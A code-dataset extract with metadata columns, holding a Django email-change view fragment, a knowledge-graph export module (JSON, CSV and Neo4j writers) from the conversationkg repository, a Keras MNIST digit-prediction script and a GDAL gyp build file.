if hasattr(settings, 'EMAIL_ACTIVATION_AFTER_CHANGING') and settings.EMAIL_ACTIVATION_AFTER_CHANGING:
send_activation_change_email(self.request, user, email)
messages.add_message(self.request, messages.SUCCESS,
_('To complete the change of mail, click on the link sent to it.'))
else:
user.email = email
user.save()
messages.add_message(self.request, messages.SUCCESS, _('Email successfully changed.'))
return super(ChangeEmailView, self).form_valid(form)
class ChangeEmailActivateView(RedirectView):
permanent = False
query_string = True
pattern_name = 'change_email'
def get_redirect_url(self, *args, **kwargs):
assert 'code' in kwargs
act = get_object_or_404(Activation, code=kwargs['code'])
# Change user's email
user = act.user
user.email = act.email
user.save()
# Remove activation record, it is unneeded
act.delete()
messages.add_message(self.request, messages.SUCCESS, _('You have successfully changed your email!'))
return super(ChangeEmailActivateView, self).get_redirect_url()
| en | 0.917576 | # Sets a test cookie to make sure the user has cookies enabled # If the test cookie worked, go ahead and # delete it since its no longer needed # Set temporary username # Change the username to "user_ID" form # Activate user's profile # Remove activation record, it is unneeded # Change user's email # Remove activation record, it is unneeded | 1.855584 | 2 |
conversationkg/kgs/writers.py | INDElab/conversationkg | 3 | 8597 | <reponame>INDElab/conversationkg<gh_stars>1-10
from ..conversations.corpus import Conversation
from ..conversations.emails import Email
from collections import Counter
import matplotlib
import pandas as pd
import json
class JSONWriter:
def __init__(self, kg):
self.kg = kg
self.entities = kg.entities()
self.triples = kg.triples
self.provenances = kg.provenances
def store(self, name, save_mapping=True):
with open(f"{name}.json", "w") as handle:
json.dump(self.translated, handle)
with open(f"{name}.provenances.json", "w") as handle:
json.dump(self.provenances, handle)
if save_mapping:
reversed_d = self.reverse_mapping(self.entity2ind)
json_d = {i:e.to_json() for i, e in reversed_d.items()}
with open(f"{name}.ind2entity.json", "w") as handle:
json.dump(json_d, handle)
reverse_d = self.reverse_mapping(self.pred2ind)
with open(f"{name}.ind2pred.json", "w") as handle:
json.dump(reverse_d, handle)
@classmethod
def restore(cls, name, load_mapping_of=None):
def get_class(cls_name):
for mod in conversations_modules:
try:
cls = getattr(mod, cls_name)
return cls
except AttributeError:
pass
raise AttributeError(f"{cls_name} could not be found in any of the modules!")
def json_to_entity(json_dict):
try:
json_dict["class"]
except KeyError:
print(json_dict.keys())
raise
cls_name = json_dict["class"]
cls = get_class(cls_name)
return cls.from_json(json_dict)
if load_mapping_of is None:
load_mapping_of = name
with open(f"{load_mapping_of}.ind2entity.json") as handle:
loaded_entity_mapping = {int(i): d for i, d in json.load(handle).items()}
ind2entity = {i:json_to_entity(d) for i, d in loaded_entity_mapping.items()}
ind2entity = {i: (Person(x) if type(x) is WholePerson else x)
for i, x in ind2entity.items()}
with open(f"{load_mapping_of}.ind2pred.json") as handle:
ind2pred = {int(i): d for i, d in json.load(handle).items()}
with open(f"{name}.json") as handle:
loaded = json.load(handle)
restored_triples = [(ind2entity[s],
ind2pred[p],
ind2entity[o]) for s, p, o in loaded]
with open(f"{name}.provenances.json") as handle:
provenances = json.load(handle)
kg = KG(restored_triples, provenances)
kg.translated = loaded
kg.entity2ind = kg.reverse_mapping(ind2entity)
kg.pred2ind = kg.reverse_mapping(ind2pred)
return kg
@staticmethod
def reverse_mapping(d):
rev_d = {}
for k, v in d.items():
if not v in rev_d:
rev_d[v] = k
else:
print("duplicate:", v)
if not type(v) is Person:
raise ValueError("Non-bijective mapping!")
return rev_d
class CSVWriter:
def __init__(self, kg):
self.kg = kg
self.entities = kg.entities()
self.triples = kg.triples
self.provenances = kg.provenances
def get_node_df(self):
records = []
sorted_ents = sorted(self.entities, key=lambda x: (str(type(x)), str(x)))
for i, e in enumerate(sorted_ents):
node_id = i # hash(e)
node_t = str(e)
node_type = type(e).__name__
node_u = f"icons/{node_type.lower()}.png"
type_ = "LinkChart" if i == 0 else "0"
if type(e) in {Conversation, Email}:
node_dtopic = e.topic.topic.index
node_dtopic_rate = round(e.topic.score, 5)
else:
node_dtopic = -1
node_dtopic_rate = 1.0
lat = lng = 0.0
records.append(
(
type_, node_type, node_id, node_u, node_t,
node_dtopic, node_dtopic_rate, lat, lng
)
)
return pd.DataFrame.from_records(records,
columns= ['type',
'node_type',
'node_id',
'node_u',
'node_t',
'node_dtopic',
'node_dtopic_rate',
'lat',
'lng']
)
def get_link_df(self):
link_types = {p for s, p, o in self.triples}
link_counts = Counter(self.triples)
colours = dict(zip(link_types, list(matplotlib.colors.cnames.values())))
sorted_ents = dict(zip(sorted(self.entities, key=str),
range(len(self.entities))))
records = []
for i, ((s, p, o), prov) in enumerate(zip(self.triples, self.provenances)):
linkId = i # hash((s, p, o)) # s.time.timestamp()
end1 = sorted_ents[s] # hash(s)
end2 = sorted_ents[o] # hash(o)
linkcount = link_counts[(s,p,o)]
linkcolor = colours[p]
linktype = p
itemID = prov
rec = [linkId,
end1,
end2,
linkcount,
linkcolor,
itemID,
linktype]
records.append(rec)
return pd.DataFrame.from_records(records,
columns=['linkId', 'end1', 'end2', 'linkcount', 'linkcolor', 'itemID', 'linktype'])
def to_csv(self, save_path):
node_df = self.get_node_df()
link_df = self.get_link_df()
node_df.to_csv(save_path + ".nodes.csv",
index=False)
link_df.to_csv(save_path + ".links.csv",
index=False)
from neo4j import GraphDatabase
class Neo4jWriter:
def __init__(self, kg):
self.kg = kg
def to_neo4j(self):
pass
def run(self, clear=True):
self.driver = GraphDatabase.driver("bolt://localhost:7687",
auth=("neo4j", "<PASSWORD>"), encrypted=False)
if clear:
tx.run("""MATCH (x)
DETACH DELETE x""")
| from ..conversations.corpus import Conversation
from ..conversations.emails import Email
from collections import Counter
import matplotlib
import pandas as pd
import json
class JSONWriter:
def __init__(self, kg):
self.kg = kg
self.entities = kg.entities()
self.triples = kg.triples
self.provenances = kg.provenances
def store(self, name, save_mapping=True):
with open(f"{name}.json", "w") as handle:
json.dump(self.translated, handle)
with open(f"{name}.provenances.json", "w") as handle:
json.dump(self.provenances, handle)
if save_mapping:
reversed_d = self.reverse_mapping(self.entity2ind)
json_d = {i:e.to_json() for i, e in reversed_d.items()}
with open(f"{name}.ind2entity.json", "w") as handle:
json.dump(json_d, handle)
reverse_d = self.reverse_mapping(self.pred2ind)
with open(f"{name}.ind2pred.json", "w") as handle:
json.dump(reverse_d, handle)
@classmethod
def restore(cls, name, load_mapping_of=None):
def get_class(cls_name):
for mod in conversations_modules:
try:
cls = getattr(mod, cls_name)
return cls
except AttributeError:
pass
raise AttributeError(f"{cls_name} could not be found in any of the modules!")
def json_to_entity(json_dict):
try:
json_dict["class"]
except KeyError:
print(json_dict.keys())
raise
cls_name = json_dict["class"]
cls = get_class(cls_name)
return cls.from_json(json_dict)
if load_mapping_of is None:
load_mapping_of = name
with open(f"{load_mapping_of}.ind2entity.json") as handle:
loaded_entity_mapping = {int(i): d for i, d in json.load(handle).items()}
ind2entity = {i:json_to_entity(d) for i, d in loaded_entity_mapping.items()}
ind2entity = {i: (Person(x) if type(x) is WholePerson else x)
for i, x in ind2entity.items()}
with open(f"{load_mapping_of}.ind2pred.json") as handle:
ind2pred = {int(i): d for i, d in json.load(handle).items()}
with open(f"{name}.json") as handle:
loaded = json.load(handle)
restored_triples = [(ind2entity[s],
ind2pred[p],
ind2entity[o]) for s, p, o in loaded]
with open(f"{name}.provenances.json") as handle:
provenances = json.load(handle)
kg = KG(restored_triples, provenances)
kg.translated = loaded
kg.entity2ind = kg.reverse_mapping(ind2entity)
kg.pred2ind = kg.reverse_mapping(ind2pred)
return kg
@staticmethod
def reverse_mapping(d):
rev_d = {}
for k, v in d.items():
if not v in rev_d:
rev_d[v] = k
else:
print("duplicate:", v)
if not type(v) is Person:
raise ValueError("Non-bijective mapping!")
return rev_d
class CSVWriter:
def __init__(self, kg):
self.kg = kg
self.entities = kg.entities()
self.triples = kg.triples
self.provenances = kg.provenances
def get_node_df(self):
records = []
sorted_ents = sorted(self.entities, key=lambda x: (str(type(x)), str(x)))
for i, e in enumerate(sorted_ents):
node_id = i # hash(e)
node_t = str(e)
node_type = type(e).__name__
node_u = f"icons/{node_type.lower()}.png"
type_ = "LinkChart" if i == 0 else "0"
if type(e) in {Conversation, Email}:
node_dtopic = e.topic.topic.index
node_dtopic_rate = round(e.topic.score, 5)
else:
node_dtopic = -1
node_dtopic_rate = 1.0
lat = lng = 0.0
records.append(
(
type_, node_type, node_id, node_u, node_t,
node_dtopic, node_dtopic_rate, lat, lng
)
)
return pd.DataFrame.from_records(records,
columns= ['type',
'node_type',
'node_id',
'node_u',
'node_t',
'node_dtopic',
'node_dtopic_rate',
'lat',
'lng']
)
def get_link_df(self):
link_types = {p for s, p, o in self.triples}
link_counts = Counter(self.triples)
colours = dict(zip(link_types, list(matplotlib.colors.cnames.values())))
sorted_ents = dict(zip(sorted(self.entities, key=str),
range(len(self.entities))))
records = []
for i, ((s, p, o), prov) in enumerate(zip(self.triples, self.provenances)):
linkId = i # hash((s, p, o)) # s.time.timestamp()
end1 = sorted_ents[s] # hash(s)
end2 = sorted_ents[o] # hash(o)
linkcount = link_counts[(s,p,o)]
linkcolor = colours[p]
linktype = p
itemID = prov
rec = [linkId,
end1,
end2,
linkcount,
linkcolor,
itemID,
linktype]
records.append(rec)
return pd.DataFrame.from_records(records,
columns=['linkId', 'end1', 'end2', 'linkcount', 'linkcolor', 'itemID', 'linktype'])
def to_csv(self, save_path):
node_df = self.get_node_df()
link_df = self.get_link_df()
node_df.to_csv(save_path + ".nodes.csv",
index=False)
link_df.to_csv(save_path + ".links.csv",
index=False)
from neo4j import GraphDatabase
class Neo4jWriter:
def __init__(self, kg):
self.kg = kg
def to_neo4j(self):
pass
def run(self, clear=True):
self.driver = GraphDatabase.driver("bolt://localhost:7687",
auth=("neo4j", "<PASSWORD>"), encrypted=False)
if clear:
tx.run("""MATCH (x)
DETACH DELETE x""") | en | 0.117977 | # hash(e) # hash((s, p, o)) # s.time.timestamp() # hash(s) # hash(o) MATCH (x) DETACH DELETE x | 2.450925 | 2 |
model-test.py | shikew/Handwriting-calculator | 0 | 8598 | import numpy as np
from PIL import Image
from keras.models import load_model
img_gray = Image.open('1002.png')
number = np.array(img_gray)
print(number.shape)
print('准备的图片的shape:',number.flatten().shape)
print('原number:',number)
number = number.astype('float32')
number = number/255 #归一化
number = number.flatten()
print('处理过后的number.shape:',number.shape)
model = load_model('mnist-dnn.h5')
# model.load_weights('mnist.model.best.hdf5')
# def recognize(photo_data):
# return clf.predict(photo_data)
print(model.predict_classes(np.array([number])))
#print('测试标签为:',test_target[8000]) | import numpy as np
from PIL import Image
from keras.models import load_model
img_gray = Image.open('1002.png')
number = np.array(img_gray)
print(number.shape)
print('准备的图片的shape:',number.flatten().shape)
print('原number:',number)
number = number.astype('float32')
number = number/255 #归一化
number = number.flatten()
print('处理过后的number.shape:',number.shape)
model = load_model('mnist-dnn.h5')
# model.load_weights('mnist.model.best.hdf5')
# def recognize(photo_data):
# return clf.predict(photo_data)
print(model.predict_classes(np.array([number])))
#print('测试标签为:',test_target[8000]) | ja | 0.124041 | #归一化 # model.load_weights('mnist.model.best.hdf5') # def recognize(photo_data): # return clf.predict(photo_data) #print('测试标签为:',test_target[8000]) | 3.317003 | 3 |
deps/libgdal/gyp-formats/ogr_mem.gyp | khrushjing/node-gdal-async | 42 | 8599 | <gh_stars>10-100
{
"includes": [
"../common.gypi"
],
"targets": [
{
"target_name": "libgdal_ogr_mem_frmt",
"type": "static_library",
"sources": [
"../gdal/ogr/ogrsf_frmts/mem/ogrmemdatasource.cpp",
"../gdal/ogr/ogrsf_frmts/mem/ogrmemlayer.cpp",
"../gdal/ogr/ogrsf_frmts/mem/ogrmemdriver.cpp"
],
"include_dirs": [
"../gdal/ogr/ogrsf_frmts/mem"
]
}
]
}
| {
"includes": [
"../common.gypi"
],
"targets": [
{
"target_name": "libgdal_ogr_mem_frmt",
"type": "static_library",
"sources": [
"../gdal/ogr/ogrsf_frmts/mem/ogrmemdatasource.cpp",
"../gdal/ogr/ogrsf_frmts/mem/ogrmemlayer.cpp",
"../gdal/ogr/ogrsf_frmts/mem/ogrmemdriver.cpp"
],
"include_dirs": [
"../gdal/ogr/ogrsf_frmts/mem"
]
}
]
} | none | 1 | 0.936372 | 1 |